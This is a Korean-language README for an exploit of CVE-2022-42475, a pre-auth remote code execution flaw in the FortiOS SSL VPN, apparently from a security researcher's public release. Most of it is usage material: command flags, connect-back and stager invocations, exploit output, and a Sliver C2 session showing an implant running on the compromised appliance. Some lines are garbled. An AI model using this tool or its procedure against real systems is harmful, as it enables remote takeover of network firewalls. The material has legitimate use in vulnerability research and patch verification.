
FortiOS SSL VPN의 사전 인증 RCE인 CVE-2022-42475용 익스플로잇입니다. 검증, 무해한 확인, 그리고 원격 액세스를 위한 connect-back 셸코드 및 암호화된 바이너리 스테이저를 사용한 전체 악용을 지원합니다.
이것은 블로그 게시물의 익스플로잇입니다: https://bishopfox.com/blog/exploit-cve-2022-42475
이 익스플로잇 버전은 해커가 ROP 가젯 등에 필요한 메모리 주소를 제공하지 않으면 작동하지 않습니다. 이 데이터를 결정하는 작업은 Bishop Fox의 기밀 및 독점 정보이며, 이 익스플로잇과 함께 게시할 수 없습니다. 이해해 주시기 바랍니다!
execve(binary_file)를 호출합니다.참고: 현재 "검증 전용" 모드는 알려진 모든 FortiOS 버전에서 작동합니다. 그러나 익스플로잇은 100D 하드웨어의 FortiOS 6.0.4에서만 작동합니다. 저는 더 이상 BF에서 근무하지 않으므로 약 18,000개 대상을 지원하는 확장된 익스플로잇을 게시할 수 없습니다.
pip3 install PyCrypto
pip3 install pycryptodome
이것은 버그를 익스플로잇하려고 시도하지 않고 대신 충돌로 트리거합니다(원격 SSL VPN 데몬이 자동으로 즉시 재시작됨). 충돌은 휴리스틱하게 감지되어 운영자에게 보고됩니다.
-v 검증 플래그를 사용하여 실행합니다:
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
이것은 버그를 트리거하고, ROP 체인을 배포하며, 셸코드로 점프합니다. 셸코드는 무해하며 다음과 같이 작동합니다:
0xbf/tmp/x on the FortiGate appliance0xbf byte to the exploit if payload decryption was successful플래그:
-t target host/IP
-p target port
-e exploit mode
-c connect-back only mode
-H and -P operator's IP:port (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
소프트웨어 버전 6.0.4와 어플라이언스 모델 100D를 모두 선택한 예:
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-] 6.0.4 [ 1 targets ] <=== 100D
[-] 5.2.14 [ 47 targets ]
[-] 5.6.9 [ 60 targets ]
[-] 6.0.13 [ 68 targets ]
[-] 6.0.14 [ 67 targets ]
[-] 6.0.15 [ 58 targets ]
[-] 6.0.8 [ 67 targets ]
[-] 6.2.11 [ 69 targets ]
[-] 6.2.7 [ 75 targets ]
[-] 6.4.10 [ 71 targets ]
[-] 6.4.2 [ 62 targets ]
[-] 6.4.3 [ 61 targets ]
[-] 6.4.6 [ 73 targets ]
[-] 6.4.9 [ 72 targets ]
[-] 7.0.4 [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!
-m으로 하드웨어 모델을 선택하지 않으면 익스플로잇이 지정된 소프트웨어 버전에 대해 모든 하드웨어 대상을 무차별 대입합니다.
0xbf/tmp/x0xbf byte to the exploitexecve("/tmp/x")플래그:
-t target host/IP
-p target port
-e exploit mode
-f filename /path/to/binary/to/execve/on/target
-H and -P operator's IP:port for connect-back (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
Sliver:
carl@pluto:~$ ./sliver-server_linux
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options
[server] sliver > mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
Exploit:
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.
다시 Sliver에서:
[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST
[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID: <err>
[server] sliver (implant5) > ls
/ (19 items, 10.0 KiB)
======================
-rw-r--r-- .ash_history 590 B Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x bin <dir> Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x data <dir> Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x data2 <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x dev <dir> Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx etc -> data/etc 8 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx fortidev -> / 1 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx init -> /sbin/init 10 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x lib <dir> Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx lib64 -> lib 3 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x migadmin <dir> Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x proc <dir> Tue Jan 31 05:23:13 +0000 2023
drwx------ root <dir> Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x sbin <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x security-rating <dir> Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x sys <dir> Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx tmp <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x usr <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x var <dir> Tue Jan 31 05:24:07 +0000 2023
Sliver가 <err>를 반환하는 것은 FortiOS가 대부분 Linux와 비슷하지만 항상 예상대로 작동하지는 않기 때문입니다. 이는 Sliver가 아닌 FortiOS의 문제입니다.
저는 더 이상 Bishop Fox에서 근무하지 않으므로 업데이트는 BF github를 확인하시기 바랍니다.